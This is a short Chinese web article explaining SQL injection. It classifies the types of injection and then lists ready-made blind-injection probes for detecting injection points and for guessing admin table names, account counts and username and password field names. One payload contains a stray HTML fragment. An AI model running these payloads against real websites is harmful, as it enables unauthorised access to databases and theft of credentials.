sql注入语句

时间:2022-10-31 12:24

sql注入语句是如何的呢?下面就让我们一起来了解一下吧:

sql注入语句其实可以分为三种的,即数字型注入点,语句一般是“select * from表名where id=1 and 1=1”;字符型注入点,语句一般是“select * from表名where name...”;搜索型注入点。

而sql注入也就是通过将SQL命令插入到Web表单提交或是输入域名、页面请求的查询字符串,最终可以达到欺骗服务器执行恶意的SQL命令。

sql注入类型通常是可以按照不同方式进行分类的,比如若是按照注入点类型来进行分类可以分为数字型注入点、字符型注入点、搜索型注入点,若是按照数据提交的方式来分类,可以分为GET 注入、POST 注入、Cookie 注入、HTTP 头部注入。

当然也可以按照执行效果来分类,可以分为基于布尔的盲注、基于时间的盲注、基于报错注入、联合查询注入。

sql注入语句

其中常用的语句有:

1、判断有无注入点

; and 1=1 and 1=2

2、猜表 通常表的名称基本上是admin adminuser user pass password 等..

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) ---判断是否存在admin这张表

3、猜帐号数目 若是遇到0< 返回正确页面 1<返回错误页面那么就说明帐号数目就是1个

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

sql注入语句

4、猜解字段名称 在len()括号里面可以加上所想到的字段名称。

and 1=(select count(*) from admin where len(*)>0)--

and 1=(select count(*) from admin where len(用户字段名称name)>0)

and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)

以上就是小编的分享了,希望能够帮助到大家。

标签:
随便看看
本类推荐
本类排行
热门标签

我国国家通讯社行不行啊细狗新年贺词祝福语2023年祝福语新年新年贺词新年贺词祝福语居家抗病毒小药箱除夕高速免费吗2022年除夕高速免费吗春联春联句子大全春联句子大全七字年夜饭十二道菜年夜饭十二道菜单年夜饭吃什么年夜饭吃什么菜吃年夜饭的寓意年夜饭黑芝麻菊花茶晒菊花茶腌腊肉送妈妈生日礼物汉白玉送闺蜜水钻送女人礼物爸爸生日送礼物送老公